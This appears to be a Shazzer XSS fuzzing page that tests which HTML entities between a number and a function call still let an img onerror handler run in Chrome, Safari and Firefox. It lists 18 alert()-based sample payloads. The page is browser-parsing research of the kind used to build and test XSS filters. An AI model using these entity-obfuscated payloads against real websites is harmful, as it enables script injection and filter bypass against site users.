Entities allowed between function call and number

This vector uses Shazzer's new features to check which entities are allowed between a function call and number using images. The results are a bit inconsistent yet because I currently wait for page load.

Created by: hackvertor

Created on: Tuesday, July 2, 2024 at 11:29:20 AM

Updated on: Thursday, November 21, 2024 at 10:24:30 AM

Vector type: XSS

Vector charset: UTF-8

Template used:
<img src=data: onerror="1$[data1]log('html($[data1])')">

Your browser was detected as:

Detecting... Detecting... Detecting... Detecting...

Sample payloads

<img src=data: onerror="1&VerticalLine;alert('&VerticalLine;')"><img src=data: onerror="1&semi;alert('&semi;')"><img src=data: onerror="1&midast;alert('&midast;')"><img src=data: onerror="1&alert('&amp;')"><img src=data: onerror="1&NewLine;alert('&NewLine;')"><img src=data: onerror="1+alert('&plus;')"><img src=data: onerror="1&LT;alert('&LT;')"><img src=data: onerror="1/alert('&sol;')"><img src=data: onerror="1&ast;alert('&ast;')"><img src=data: onerror="1&Hat;alert('&Hat;')"><img src=data: onerror="1<alert('&lt;')"><img src=data: onerror="1|alert('&verbar;')"><img src=data: onerror="1,alert('&comma;')"><img src=data: onerror="1>alert('&gt;')"><img src=data: onerror="1|alert('&vert;')"><img src=data: onerror="1&GT;alert('&GT;')"><img src=data: onerror="1&AMP;alert('&AMP;')"><img src=data: onerror="1&percnt;alert('&percnt;')">

Fuzz results

Chrome 126.0.0.0 desktop macOS 10.15.7

Updated

Tue Jul 02 2024

Found 18 results

Show differences only?

Filter out alphanumeric

Sort ascending

Safari 18.0 desktop macOS 10.15.7

Updated

Tue Jul 02 2024

Found 18 results

Show differences only?

Filter out alphanumeric

Sort ascending

Firefox 127.0 desktop macOS 10.15

Updated

Tue Jul 02 2024

Found 18 results

Show differences only?

Filter out alphanumeric

Sort ascending